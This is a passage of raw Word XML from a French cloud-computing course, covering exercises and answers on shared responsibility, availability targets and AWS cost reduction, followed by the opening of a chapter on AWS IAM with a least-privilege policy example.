            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Un fournisseur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2651"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Simplicité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Exigence réglementaire de réversibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Deux fournisseurs, portabilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Contrat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rachat ou héritage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Consolidation progressive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2651"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Coût de migration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Service spécialisé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Multi-cloud ciblé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Meilleur outil par usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Cinq choix de portabilité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Réduire la dépendance sans multi-cloud</w:t>
        <w:br/>
        <w:t>- Conteneurs plutôt que services propriétaires</w:t>
        <w:br/>
        <w:t>- Terraform plutôt que console</w:t>
        <w:br/>
        <w:t>- Stockage compatible S3</w:t>
        <w:br/>
        <w:t>- Kubernetes plutôt qu'orchestrateur propriétaire</w:t>
        <w:br/>
        <w:t>- Sauvegardes exportables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La portabilité se prépare au niveau des interfaces : un conteneur, une infrastructure décrite, un stockage standard. Elle ne consiste pas à faire tourner la même architecture partout.</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AVANT D'OUVRIR UN COMPTE CLOUD</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 budget et une alerte de dépassement.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Une convention d'étiquetage.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Une politique d'accès par rôle, jamais root.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Une région choisie pour la latence et le droit applicable.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Une procédure de suppression des ressources de test.</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IaaS, CaaS, PaaS et serverless délèguent des responsabilités différentes.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client reste responsable de sa configuration et de ses données.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Tout échoue partiellement : l'architecture doit tolérer la panne.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architecture multi-zone répond à un objectif chiffré.</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sortie réseau est un poste souvent sous-estimé.</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étiquettes déterminent la capacité à analyser les coûts.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multi-cloud ajoute de la complexité autant que de la liberté.</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portabilité se prépare par les interfaces, pas par la duplication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le modèle est compris. Le chapitre suivant parcourt les services essentiels d'un fournisseur : AWS.</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70.1 — Répartir les responsabilités</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ARCHITECTURE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois services doivent être classés selon le modèle partagé.</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Une VM avec PostgreSQL</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Une base managée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Une fonction serverless</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 70.2 — Chiffrer un objectif de disponibilité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ARCHITECTURE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une équipe promet « une haute disponibilité ».</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Transformez la promesse en chiffre.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Calculez l'indisponibilité mensuelle.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Déduisez l'architecture nécessaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 70.3 — Réduire une facture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   FINOPS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La facture mensuelle a doublé en trois mois.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Identifiez les trois premiers postes.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Cherchez les ressources inertes.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Proposez trois actions.</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70.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>VM : le client gère l'OS, les correctifs, la sauvegarde, la haute disponibilité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Base managée : le fournisseur gère l'OS et les correctifs, le client gère les accès, le schéma et les sauvegardes logiques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Serverless : le fournisseur gère le runtime et la montée en charge, le client gère le code, les permissions et les quotas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 70.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>« Haute disponibilité » n'est pas mesurable : choisissez 99,9 % ou 99,95 %.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>99,9 % sur 30 jours = environ 43 minutes ; 99,95 % = environ 21 minutes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>43 minutes tolèrent une reprise manuelle ; 21 minutes exigent une reprise automatique multi-zone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 70.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>aws ce get-cost-and-usage --time-period Start=2026-09-01,End=2026-10-01 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --granularity MONTHLY --metrics BlendedCost \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --group-by Type=DIMENSION,Key=SERVICE --output table</w:t>
        <w:br/>
        <w:br/>
        <w:t>aws ec2 describe-instances --filters Name=instance-state-name,Values=stopped \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --query "Reservations[].Instances[].InstanceId" --output text</w:t>
        <w:br/>
        <w:br/>
        <w:t>aws ec2 describe-volumes --filters Name=status,Values=available \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --query "Volumes[].VolumeId" --output text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un doublement vient souvent d'un environnement de test laissé actif ou d'instantanés jamais purgés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La suppression des volumes non attachés et des adresses non associées est immédiate et sans risque.</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Qui est responsable de la configuration d'une base managée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Le fournisseur</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 client</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Personne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L'auditeur</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 signifie 99,9 % de disponibilité sur 30 jours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9 minutes d'arrêt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Environ 43 minutes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Environ 7 heures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Aucun arrêt</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Quel poste de coût est souvent sous-estimé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Le calcul</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 stockage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La sortie réseau</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Les adresses IP</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Comment préparer la portabilité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Dupliquer l'architecture partout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Standardiser les interfaces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Choisir le moins cher</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Éviter les conteneurs</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Le fournisseur gère l'infrastructure ; la configuration reste au client.</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0,1 % de 43 200 minutes représente environ 43 minutes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Les transferts sortants sont facturés et augmentent avec l'usage.</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Conteneurs, IaC et stockage standard réduisent la dépendance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>71. AWS : services essentiels et bonnes pratiques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Le socle d'un compte AWS : identités, réseau, calcul, stockage et supervision.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 30 · Niveau : Intermédiaire · Prérequis : chapitre 70</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Sécuriser les accès avec IAM.</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Construire un réseau VPC minimal.</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Choisir un service de calcul adapté.</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Utiliser le stockage objet correctement.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Superviser et alerter sans bruit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>71.1 IAM : identités et permissions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Tout accès AWS passe par IAM. Une permission est accordée par une politique attachée à une identité ou à une ressource. Le compte root ne doit servir qu'à la création du compte et à quelques opérations exceptionnelles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.262 — Cinq notions IAM</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55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Notion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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336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Bonne pratique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Utilisateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Identité humaine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3363"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fédération plutôt que clés</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Rôle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Identité assumable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Préféré aux utilisateurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Politique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Document JSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3363"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Moindre privilège</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Groupe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Ensemble d'utilisateurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Permissions cohérentes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Clé d'accès</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Identifiant programmatique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3363"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Éviter, faire tourner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une politique au moindre privilège · json</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w:t>
        <w:br/>
        <w:t xml:space="preserve">  "Version": "2012-10-17",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "Statement": [</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "Sid": "LireUnSeulPrefixe",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "Effect": "Allow",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "Action": ["s3:GetObject", "s3:ListBucket"],</w:t>
